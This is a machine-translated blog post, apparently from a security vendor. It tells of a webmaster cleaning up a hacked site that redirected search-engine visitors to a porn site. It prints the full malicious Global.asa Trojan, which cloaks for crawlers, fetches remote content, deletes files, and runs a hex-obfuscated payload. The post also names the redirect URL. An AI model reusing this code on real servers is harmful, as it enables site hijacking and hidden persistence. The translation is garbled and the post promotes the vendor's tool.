Web site by Black Webmaster Solutions

Intermediary transaction SEO diagnosis Taobao guest Cloud host technology Hall

The most recent unit website in Baidu Search Click Open are yellow, and direct input URL is not a problem, in Baidu search is prompted for the site is black, many customers search our site have entered the yellow site, the company's image has caused a great impact, as the company's Web site technicians, has been engaged in the past 5 years old webmaster, what did not frighten, from the beginning of the analysis of the site was black reason.

Based on the collection of Baidu

Baidu site under their own website found a lot of pornographic content snapshots, what movies, what the beauty of the host, see a full of more than 300 snapshots, and then look at the site home page included, found that has been unrecognizable, Baidu snapshots are empty. The title of the website is the address of the website, the content is also empty. I realized that, the website must be K.

Open any one of these addresses, jump directly to the yellow site, the site address is: http://mrr.8800.org/mm/

The following figure:

The problem is slowly surfacing

First of all, the surface of the site is a proliferation of Web sites, are included in a number of malicious content and illegal content (including the color of the moment, and so on). Another surface feature is from the search engine to the click will automatically jump to the yellow site, you enter the site will not appear jump. At this time I fully identified the site is the problem of the program, landing space FTP found that the root directory has many unfamiliar folders, the inside of the site files can not be deleted, the old hint does not have permission to delete. Further down the level of the directory to see a strange file name, is Global.asa with Sinesafe Trojan Detection Tool detected is a Trojan file, the contents are as follows:

< script runat= "Server" >

' Web site global file

Sub Application_OnStart

End Sub

Sub Application_OnEnd

End Sub

Public Function gethtml (URL)

Set objxmlhttp=server.createobject ("Msxml2.serverxmlhttp")

Objxmlhttp.open "Get", Url,false

Objxmlhttp.setrequestheader "user", url

Objxmlhttp.send

Gethtml=objxmlhttp.responsebody

Set objxmlhttp=nothing

Set objstream = Server.CreateObject ("ADODB.stream")

objStream.Type = 1

Objstream.mode =3

objStream.Open

Objstream.write gethtml

objstream.position = 0

objStream.Type = 2

Objstream.charset = "gb2312"

gethtml = Objstream.readtext

objStream.Close

End Function

Function Check (user_agent)

Allow_agent=split ("Baiduspider,sogou,baidu,sosospider,googlebot,fast-webcrawler,msnbot,slurp,qihoobot, Youdaobot,iaskspider ",", ")

Check_agent=false

For Agenti=lbound (allow_agent) To UBound (allow_agent)

If InStr (User_agent,allow_agent (agenti)) >0 Then

Check_agent=true

Exit For

End If

Next

Check=check_agent

End Function

Function Checkrefresh ()

Checkrefresh = False

Dim Botlist,i,repls

Krobotlist = "Baidu|google|sogou|soso|yahoo|bing|youdao|qihoo|iask"

Botlist = Split (krobotlist, "|")

For i = 0 to Ubound (botlist)

If InStr (Left (Request.ServerVariables ("Http_referer"), ""), Botlist (i)) > 0 Then

Checkrefresh = True

Exit for

End If

Next

End Function

Sub Session_OnStart

On Error Resume Next

. ServerVariables ("path_translated")

Set s=server.createobject ("Scripting.FileSystemObject")

Set F=s.getfile ("//./" & Server.MapPath ("/global.asa"))

V=request.form&request.querystring

If InStr (V, ". Asa") >0 Then

f.attributes=39

Response.End ()

End If

If InStr (Name, ";") >0 OR InStr (server. MapPath ("."), ". as") >0 Then

S.getfile (name). Attributes=0

S.deletefile (name)

f.attributes=39

Response.End ()

End If

S= "636e6e62643d6c6361736528726571756573742e736572766572:o=": For I=1 to Len (s) step 2:c=mid (s,i,2): If isnumeric (Mid s,i,1)) Then:execute ("O=O&CHR (&h &c&)"): Else:execute ("O=o&chr &h" &c&mid (s,i+ 2,2) & "): I=i+2:end If:Next:execute O

End Sub

I've got a little bit of a circle watching these codes.

Baiduspider,sogou,baidu,sosospider,googlebot,fastwebcrawler,msnbot,slurp,qihoo "This line of code is the search engine's conditional jump code, That is to say, the Trojan is based on search engines, as long as it is from Baidu and Sogou and Google will jump directly to the site he set.

There are some binary code, is added a secret, I do not understand the decryption, but my analysis is his set jump URL. Looking for a few friends to look at the code, my good friend Lao Liu said there is a condition jump, is based on cookies and IP to jump, the same IP and cookies will only play the window once, will not play the window the second time. The hacker's technique is also very clever, visible for the benefit to use so sinister recruit. This code is safe and almost impossible for webmasters to detect.

If the roots are found, solve the problem

The website program source code from the space download down, put to sinesafe trojan detection tool detection, and found a lot of Trojan paper, which has global.asa z.aspx cende.asp phzltoxn.php, I do not publish the Trojan code here, nonsense not to speak more, Direct click to clear Trojan, Trojan all delete. FTP deleted files, find a space to let them in the server directly delete empty directory. The last step is to put the site's background password to get rid of last year's csdn password leak incident really let people worry about, before I was a loss, csdn password and my mailbox password are used the same, resulting in my mailbox was stolen, Alipay has been mentioned, this loss of food I was a lifetime to remember, bitten ten years shy!

When the password is changed, the address of the database then the removal of the Trojan Web site files back to the side, to upload space, site access is normal, before being hackers left Baidu traces to Baidu Complaint Center to submit, the site was black reason to write, such as Baidu Update period, the problem can be solved.

Walking all the way, very difficult, experience is the most valuable, but also hope that the above solutions can help more people in need of help. Each webmaster experience is not the same, can be selfless share, then, we webmaster Road will go farther! This article content source server security www.sinesafe.cn A5 First welcome reprint, reprint please indicate the author and the source. Thank you!